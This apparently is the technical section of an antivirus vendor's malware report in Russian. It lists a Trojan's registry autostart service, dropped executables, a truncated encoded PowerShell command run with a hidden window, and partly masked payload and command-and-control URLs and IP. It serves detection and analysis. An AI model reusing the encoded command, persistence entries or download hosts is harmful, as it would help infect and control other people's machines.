Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\iasacct] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\iasacct] 'ImagePath' = '"%WINDIR%\SysWOW64\kbd106n\iasacct.exe"'
- 'iasacct' "%WINDIR%\SysWOW64\kbd106n\iasacct.exe"
- 'iasacct' %WINDIR%\SysWOW64\kbd106n\iasacct.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEwAWQBFAFYAbAB6AGcAPQAnAFUAWQBWAFEAWQBtAGMAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBgAFUAcgBpAFQAYABZAHAAUgBvAGAAVABgAE8AYwBPAEwAIgAgAD...
- %HOMEPATH%\222.exe
- %WINDIR%\syswow64\kbd106n\iasacct.exe
- %HOMEPATH%\222.exe в %WINDIR%\syswow64\kbd106n\iasacct.exe
- '78.##9.60.109':443
- http://pa###ncheta.com/breezes/wwlew3341719/
- http://www.pa###ncheta.com/breezes/wwlew3341719/
- http://nu##gi.com/old/qzbCEKop/
- http://78.###.60.109:443/oizs7nSAcpARF/mtcXSS/v1h8/ZO90CP/Zefi64aMzn2aTYiBlc/ejSUOo9B5/ via 78.##9.60.109
- DNS ASK lg##ss.com
- DNS ASK pa###ncheta.com
- DNS ASK nu##gi.com
- '%HOMEPATH%\222.exe'
- '%WINDIR%\syswow64\kbd106n\iasacct.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEwAWQBFAFYAbAB6AGcAPQAnAFUAWQBWAFEAWQBtAGMAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBgAFUAcgBpAFQAYABZAHAAUgBvAGAAVABgAE8AYwBPAEwAIgAgAD...' (со скрытым окном)